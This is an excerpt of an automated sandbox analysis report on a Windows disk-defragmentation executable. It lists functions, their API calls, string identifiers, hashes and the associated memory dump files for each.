                                                                                                                                                                                                                                                                                                • Opcode ID: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                                • Instruction ID: 1f5745e592a7c845df3e12826af7c739e18eef66d9bd278cacb692334ad6c886
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9743f72da57c074d58d316d1bd28a9e36e8f97539fd99808d5436539a86e7788
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1A194B0B50301ABD310AF658D82FAE73A5AF48B04F10491FFA5EB76D1D7A8BD00965D
                                                                                                                                                                                                                                                                                                Function 0041A1F1 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 128windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateSolidBrush.GDI32(?), ref: 0041A2A5
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A7B0: CloseHandle.KERNEL32(?,0041A113), ref: 0041A7BB
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A770: CreateMutexW.KERNEL32(00000000,00000000,{E0A52416-D56A-4c3d-BFC7-3F40E77C718E}), ref: 0041A782
                                                                                                                                                                                                                                                                                                • EnumWindows.USER32 ref: 0041A2F2
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0041A2FD
                                                                                                                                                                                                                                                                                                • SetForegroundWindow.USER32(?), ref: 0041A310
                                                                                                                                                                                                                                                                                                • EnumWindows.USER32(Function_00019F90,?), ref: 0041A34F
                                                                                                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 0041A35A
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000108E,00000000,00000000), ref: 0041A372
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Window$CreateEnumWindows$BrushCloseForegroundHandleMessageMutexSendSolid
                                                                                                                                                                                                                                                                                                • String ID: -BootTimeDefrag$8<$DiskDefrag$Foucs_Color$Frame_Color$Mid_Back_Color$Select_Color$Text_Color$Window
                                                                                                                                                                                                                                                                                                • API String ID: 2433303760-2309799116
                                                                                                                                                                                                                                                                                                • Opcode ID: 70afbaaa209b5f4c0eb50287e16e1692c40512dff5ed34459b4bb6cb62927c05
                                                                                                                                                                                                                                                                                                • Instruction ID: 9fe1ff023ffd13c005f793ce9add20bfadde0b2b9dc18c99357dbdc95238beea
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 70afbaaa209b5f4c0eb50287e16e1692c40512dff5ed34459b4bb6cb62927c05
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45417470654340BBD710BB608C86FAF76A4AF44704F10482EF559A22C1DBB9A5588B6B
                                                                                                                                                                                                                                                                                                Function 0040AE80 Relevance: 26.7, APIs: 2, Strings: 13, Instructions: 434COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetObjectW.GDI32(?,0000005C,?), ref: 0040AEFA
                                                                                                                                                                                                                                                                                                • MulDiv.KERNEL32(?,?,00000048), ref: 0040AF5E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Object
                                                                                                                                                                                                                                                                                                • String ID: CharSet$ClipPrecision$Escapement$Italic$Name$Orientation$OutPrecision$PitchAndFamily$Quality$Size$StrikeOut$Underline$Weight
                                                                                                                                                                                                                                                                                                • API String ID: 2936123098-848768055
                                                                                                                                                                                                                                                                                                • Opcode ID: 581e2151a43bffb8372fa4f7334b51b32000fb86fe427fbed1d6e470a93a997b
                                                                                                                                                                                                                                                                                                • Instruction ID: 678cc5ad66024a4e3a2d6689a74d43ebfb952ff3fe0b92c748617c9598e0b8bb
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 581e2151a43bffb8372fa4f7334b51b32000fb86fe427fbed1d6e470a93a997b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2E021371508740DFD360DF61C984B5BB7F9EB88304F108A2EF98A87291D778A944CFA6
                                                                                                                                                                                                                                                                                                Function 00421750 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 306windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001013,?,00000000), ref: 004217C5
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 0042187C
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001028,00000000,00000000), ref: 00421890
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001027,00000000,00000000), ref: 004218A6
                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 004218BC
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00421580: RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,?,004217B6,?,1088D068), ref: 004215AC
                                                                                                                                                                                                                                                                                                • GetTickCount.KERNEL32 ref: 004218F0
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: MessageSend$CountRedrawTickWindow
                                                                                                                                                                                                                                                                                                • String ID: 3401097$ScheduleStart$`=
                                                                                                                                                                                                                                                                                                • API String ID: 1016491994-4255795148
                                                                                                                                                                                                                                                                                                • Opcode ID: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                                • Instruction ID: a2f7d2ab4a79c621e2b3341a28b2bdd177a5bb8c7450e01432b01053e343f094
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 059351e3aaae428ad539f55a8dcfe394caba1a022192f3b5fcbeae5e242c694e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2FB117717003119BC720EF64DCC5FAA77A5AF94710F50493EF9099B2E1DB78A844CBAA
                                                                                                                                                                                                                                                                                                Function 00401570 Relevance: 24.8, APIs: 12, Strings: 2, Instructions: 273windowCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GdipGetImagePixelFormat.GDIPLUS(?,?), ref: 00401593
                                                                                                                                                                                                                                                                                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 004015F2
                                                                                                                                                                                                                                                                                                • GdipGetImageWidth.GDIPLUS(?,?,?,?,?,?), ref: 00401613
                                                                                                                                                                                                                                                                                                • GdipGetImagePaletteSize.GDIPLUS(?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040165A
                                                                                                                                                                                                                                                                                                • GdipGetImagePalette.GDIPLUS(?,00000008,?,80070057,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 004016CF
                                                                                                                                                                                                                                                                                                • GdipBitmapLockBits.GDIPLUS(?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 0040177B
                                                                                                                                                                                                                                                                                                • GdipBitmapUnlockBits.GDIPLUS(?,?,?,?,00000001,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004017F1
                                                                                                                                                                                                                                                                                                • GdipCreateBitmapFromScan0.GDIPLUS(?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?,?,?), ref: 00401817
                                                                                                                                                                                                                                                                                                • GdipGetImageGraphicsContext.GDIPLUS(?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?,?,?,?,?), ref: 0040182D
                                                                                                                                                                                                                                                                                                • GdipDrawImageI.GDIPLUS(00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?,?), ref: 00401840
                                                                                                                                                                                                                                                                                                • GdipDeleteGraphics.GDIPLUS(00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?,?), ref: 00401846
                                                                                                                                                                                                                                                                                                • GdipDisposeImage.GDIPLUS(?,00000000,00000000,?,00000000,00000000,?,00000000,?,?,00022009,00022009,?,?,00000000,?), ref: 0040184C
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Gdip$Image$Bitmap$BitsGraphicsPalette$ContextCreateDeleteDisposeDrawFormatFromHeightLockPixelScan0SizeUnlockWidth
                                                                                                                                                                                                                                                                                                • String ID: &$>=
                                                                                                                                                                                                                                                                                                • API String ID: 1279047860-1654677323
                                                                                                                                                                                                                                                                                                • Opcode ID: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                                • Instruction ID: 8a788743ff85fe53078408617ba339fa43619964413e8471535d34c3641ef31a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34576b26573d57f11954caa93c89dd37f9b4685469006894c39224902bd046cc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66A175B1E002059FDB14DF95D881AAFB7B5EF88304F14852EE919BB351D738E941CBA8
                                                                                                                                                                                                                                                                                                Function 00453F10 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 201fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,00000328,?,00000000), ref: 00453F69
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00453FDE
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00454016
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328,00000000,00000000), ref: 00454026
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00454057
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 00454066
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?), ref: 00454071
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 004540A7
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,004542BB,?,00000328), ref: 004540D7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandle$ControlDeviceErrorLast$CreateDiskFileFreeSpace
                                                                                                                                                                                                                                                                                                • String ID: C:\$\\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 4273481478-2866759028
                                                                                                                                                                                                                                                                                                • Opcode ID: 34a5edf5a5058048d5bcc646d78f8edc09eed289d58a581d59fe32c4679fd1ad
                                                                                                                                                                                                                                                                                                • Instruction ID: dcbbcf768856184cb3fb00598b231148ced9fb8d52ef67d3d26bd90cee913ac4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34a5edf5a5058048d5bcc646d78f8edc09eed289d58a581d59fe32c4679fd1ad
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CA616C72608300AFC310DF69D88196BF7E4FFD8711F804A2EF55987291EB759848CB96
                                                                                                                                                                                                                                                                                                Function 00453BD0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 200fileCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00453C29
                                                                                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00453C9B
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00453CD3
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0045B451), ref: 00453CE3
                                                                                                                                                                                                                                                                                                • DeviceIoControl.KERNEL32(00000000,0009006F,?,00000008,00000000,?,?,00000000), ref: 00453D14
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00453D23
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00453D2E
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00453D64
                                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00453D94
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000016.00000002.2667292392.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667226693.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667429056.000000000047C000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667468832.0000000000496000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667537697.0000000000497000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667598734.0000000000499000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667704998.00000000004D6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667787124.0000000000545000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667844328.0000000000548000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667891019.0000000000551000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2667930601.0000000000554000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668017081.000000000055A000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668071532.000000000055D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668125277.0000000000565000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668176716.000000000056A000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668236751.0000000000599000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                • Associated: 00000016.00000002.2668283215.000000000059C000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_22_2_400000_111392827.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CloseHandle$ControlDeviceErrorLast$CreateDiskFileFreeSpace
                                                                                                                                                                                                                                                                                                • String ID: C:\$\\.\C:
                                                                                                                                                                                                                                                                                                • API String ID: 4273481478-2866759028
                                                                                                                                                                                                                                                                                                • Opcode ID: f228107344c7f80b23727888f3ccfa0318b04976a6bc281055e8ce1e817f9b41
                                                                                                                                                                                                                                                                                                • Instruction ID: 4e319efc0b140ea32d15ab3920dd7af36ea307e7c4a1d425a09acf6eef36fbe0
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f228107344c7f80b23727888f3ccfa0318b04976a6bc281055e8ce1e817f9b41
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D9617BB2608300AFC314DF69DC8196BF7F4EFD8751F804A2EF55983251E77599088B9A
                                                                                                                                                                                                                                                                                                Function 00422450 Relevance: 22.7, APIs: 15, Instructions: 169windowtimeCOMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                APIs
